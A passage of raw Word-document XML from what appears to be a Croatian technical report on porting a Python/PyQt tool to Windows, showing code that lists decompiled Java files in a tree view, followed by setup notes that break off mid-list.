    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.connect(self.treeWidget_files, SIGNAL("itemDoubleClicked(QTreeWidgetItem *, int)"), self.locateFile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        pheader = self.treeWidget_files.header()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        pheader.setResizeMode(3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        pheader.setStretchLastSection(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.treeWidget_files.setStyleSheet("QTreeView::item:hover{background-color:rgb(0,255,0,50)}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                                             "QTreeView::item:selected{background-color:rgb(255,0,0,100)}")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        import Global</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        for i in range(100):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            time.sleep(100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            print "########still ded"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            print i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            if Global.FLAG_JAD == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">              print "ded finish"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">              break</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#        while True:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#           time.sleep(100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#           i=i+1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#           print "########still ded"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#           if Global.FLAG_JAD == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#             break</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#        if Global.FLAG_JAD != 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>#            return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t># Modifications made by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t># In Windows, for loop does not show adequate directory names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        rootpath = SYSPATH +  "/temp/java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        parent = self.treeWidget_files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        path2parent = {rootpath:parent}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        for root, dirs, files in os.walk(rootpath):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    newroot = string.replace(root, '\\\\', '\\')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            for f in files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                parent = path2parent[newroot]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                child = QTreeWidgetItem(parent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                child.setText(0, f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            for d in dirs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                parent = path2parent[newroot]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                child = QTreeWidgetItem(parent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                child.setText(0, d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">                path2parent[newroot + "\\" +d] = child</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># End of modification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00062D1C" w:rsidRDefault="00062D1C" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00062D1C" w:rsidRDefault="00062D1C" w:rsidP="0047024B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc406756521"/>
      <w:bookmarkStart w:id="100" w:name="_Toc406756634"/>
      <w:r>
        <w:t>Napomene o programu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00D5261B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Program bi nakon prethodnih promjena trebao pružiti potpunu funkcionalnost na Windows operativnim sustavima, no treba paziti na sljedeće:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00D5261B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Prije pokretanja programa treba postojati direktorij Temp u direktoriju gdje je spremljen projekt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00D5261B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
